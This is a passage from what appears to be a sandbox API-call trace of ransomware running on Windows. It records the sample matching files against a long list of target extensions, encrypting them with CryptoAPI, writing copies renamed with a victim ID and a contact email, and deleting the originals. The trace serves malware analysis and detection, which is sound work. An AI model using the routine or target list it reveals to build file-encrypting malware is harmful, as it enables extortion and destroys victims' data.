	[0188.379] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\x8zc5.xls" | out: lpString1="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\x8zc5.xls") returned="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\x8zc5.xls"
	[0188.380] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\x8zc5.xls") returned 61
	[0188.380] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0188.380] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.380] StrStrW (lpFirst=".xls", lpSrch=".") returned=".xls"
	[0188.380] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.381] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".xls") returned=".xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0188.381] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0188.381] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0188.381] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\x8zc5.xls" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\x8zc5.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0188.384] ReadFile (in: hFile=0x2c0, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x97da, lpNumberOfBytesRead=0x18b350, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18b350*=0x97da, lpOverlapped=0x0) returned 1
	[0188.387] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.387] CryptAcquireContextW (in: phProv=0x18af00, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18af00*=0xfcabc0) returned 1
	[0188.390] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.390] CryptCreateHash (in: hProv=0xfcabc0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18af04 | out: phHash=0x18af04) returned 1
	[0188.390] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.390] CryptHashData (hHash=0xfb9830, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0188.390] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.391] CryptDeriveKey (in: hProv=0xfcabc0, Algid=0x6610, hBaseData=0xfb9830, dwFlags=0x1, phKey=0x18af08 | out: phKey=0x18af08*=0xfb9530) returned 1
	[0188.391] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.391] CryptEncrypt (in: hKey=0xfb9530, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18af1c*=0x97da, dwBufLen=0x97da | out: pbData=0x0*, pdwDataLen=0x18af1c*=0x97e0) returned 1
	[0188.392] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0188.392] RtlMoveMemory (in: Destination=0xfe6968, Source=0xfdd180, Length=0x97da | out: Destination=0xfe6968) 
	[0188.392] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.392] CryptEncrypt (in: hKey=0xfb9530, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe6968*, pdwDataLen=0x18aefc*=0x97da, dwBufLen=0x97e0 | out: pbData=0xfe6968*, pdwDataLen=0x18aefc*=0x97e0) returned 1
	[0188.393] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.404] CryptDestroyKey (hKey=0xfb9530) returned 1
	[0188.404] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.410] CryptDestroyHash (hHash=0xfb9830) returned 1
	[0188.410] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.411] CryptReleaseContext (hProv=0xfcabc0, dwFlags=0x0) returned 1
	[0188.411] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0188.411] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18af18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18af18*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0188.412] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.412] GetUserNameA (in: lpBuffer=0x18adfc, pcbBuffer=0x18af14 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18af14) returned 1
	[0188.413] wsprintfW (in: param_1=0x18af30, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\x8zc5.xls.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 103
	[0188.413] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\x8zc5.xls.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\x8zc5.xls.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0188.414] WriteFile (in: hFile=0x388, lpBuffer=0xfe6968*, nNumberOfBytesToWrite=0x97e0, lpNumberOfBytesWritten=0x18b358, lpOverlapped=0x0 | out: lpBuffer=0xfe6968*, lpNumberOfBytesWritten=0x18b358*=0x97e0, lpOverlapped=0x0) returned 1
	[0188.420] CloseHandle (hObject=0x388) returned 1
	[0188.420] CloseHandle (hObject=0x2c0) returned 1
	[0188.420] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\x8zc5.xls" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\x8zc5.xls")) returned 1
	[0188.434] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\x8zc5.xls" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\x8zc5.xls")) returned 0
	[0188.434] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18bba4 | out: lpFindFileData=0x18bba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd262fba0, ftCreationTime.dwHighDateTime=0x1d975ab, ftLastAccessTime.dwLowDateTime=0x114d9360, ftLastAccessTime.dwHighDateTime=0x1d9769d, ftLastWriteTime.dwLowDateTime=0x114d9360, ftLastWriteTime.dwHighDateTime=0x1d9769d, nFileSizeHigh=0x0, nFileSizeLow=0x9787, dwReserved0=0x0, dwReserved1=0x0, cFileName="ymaFVURVGUZ8pQ7S.ots", cAlternateFileName="YMAFVU~1.OTS")) returned 1
	[0188.434] lstrcmpW (lpString1="ymaFVURVGUZ8pQ7S.ots", lpString2="..") returned 1
	[0188.434] lstrcmpW (lpString1="ymaFVURVGUZ8pQ7S.ots", lpString2=".") returned 1
	[0188.434] lstrcpyW (in: lpString1=0x18bdf4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\"
	[0188.434] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\", lpString2="ymaFVURVGUZ8pQ7S.ots" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ymaFVURVGUZ8pQ7S.ots") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ymaFVURVGUZ8pQ7S.ots"
	[0188.435] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ymaFVURVGUZ8pQ7S.ots") returned 72
	[0188.435] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0188.435] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ymaFVURVGUZ8pQ7S.ots", cchLength=0x48 | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\ymafvurvguz8pq7s.ots") returned 0x48
	[0188.435] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.435] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\ymafvurvguz8pq7s.ots", lpSrch="help_decrypt_your_files") returned 0x0
	[0188.435] lstrcpyW (in: lpString1=0x18b99c, lpString2="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\ymafvurvguz8pq7s.ots" | out: lpString1="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\ymafvurvguz8pq7s.ots") returned="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\ymafvurvguz8pq7s.ots"
	[0188.436] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\ymafvurvguz8pq7s.ots") returned 72
	[0188.436] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0188.436] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.436] StrStrW (lpFirst=".ots", lpSrch=".") returned=".ots"
	[0188.436] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0188.437] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rct